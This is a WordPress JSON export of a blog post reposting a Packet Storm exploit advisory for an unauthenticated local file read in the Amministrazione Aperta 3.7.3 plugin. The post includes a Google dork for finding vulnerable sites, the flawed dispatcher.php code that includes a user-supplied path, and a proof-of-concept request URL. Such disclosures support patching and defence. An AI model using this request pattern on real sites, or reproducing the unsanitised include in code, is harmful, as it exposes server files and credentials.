{"id":22086,"date":"2022-03-23T21:19:30","date_gmt":"2022-03-23T17:19:30","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166407\/wpaae373-fileread.txt"},"modified":"2022-03-27T09:38:41","modified_gmt":"2022-03-27T05:08:41","slug":"wordpress-amministrazione-aperta-3-7-3-arbitrary-file-read","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-amministrazione-aperta-3-7-3-arbitrary-file-read\/","title":{"rendered":"WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read"},"content":{"rendered":"
\n
WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read<\/strong><\/a><\/dt>\n
Posted Mar 23, 2022<\/a><\/dd>\n
Authored by Hassan Khan Yusufzai<\/a><\/dd>\n
WordPress Amministrazione Aperta plugin version 3.7.3 suffers from an arbitrary file read vulnerability.<\/dd>\n
tags | exploit<\/a>, arbitrary<\/a><\/dd>\n
MD5 | 8dd07978b438f1e9484ef164f2dc5d93<\/code><\/dd>\n
Download<\/a> | Favorite<\/a> | View<\/a><\/dd>\n<\/dl>\n
\n
# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated\r\n# Google Dork: inurl:\/wp-content\/plugins\/amministrazione-aperta\/\r\n# Date: 23-03-2022\r\n# Exploit Author: Hassan Khan Yusufzai - Splint3r7\r\n# Vendor Homepage: https:\/\/wordpress.org\/plugins\/amministrazione-aperta\/\r\n# Version: 3.7.3\r\n# Tested on: Firefox<\/code><\/pre>\n
# Vulnerable File: dispatcher.php<\/p>\n
<\/code><\/pre>\n
# Vulnerable Code:<\/p>\n
<\/code><\/pre>\n
“`
\nif ( isset($_GET[‘open’]) ) {
\ninclude(ABSPATH . ‘wp-content\/plugins\/’.$_GET[‘open’]);
\n} else {
\necho ‘
\n<div id=”welcome-panel” class=”welcome-panel”
\nstyle=”padding-bottom: 20px;”>
\n<div class=”welcome-panel-column-container”>’;<\/p>\n
<\/code><\/pre>\n
include_once( ABSPATH . WPINC . ‘\/feed.php’ );
\n“`<\/p>\n
<\/code><\/pre>\n
# Proof of Concept:<\/p>\n
<\/code><\/pre>\n
localhost\/wp-content\/plugins\/amministrazione-aperta\/wpgov\/dispatcher.php?open=[LFI]\n
<\/code><\/pre>\n
 <\/p>\n
<\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read Posted Mar 23, 2022 Authored by Hassan Khan Yusufzai WordPress Amministrazione Aperta plugin version 3.7.3 suffers from an arbitrary file read vulnerability. tags | exploit, arbitrary MD5 | 8dd07978b438f1e9484ef164f2dc5d93 Download | Favorite | View # Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 – Local File Read – Unauthenticated # …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-22086","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22086","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=22086"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22086\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=22086"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=22086"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=22086"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}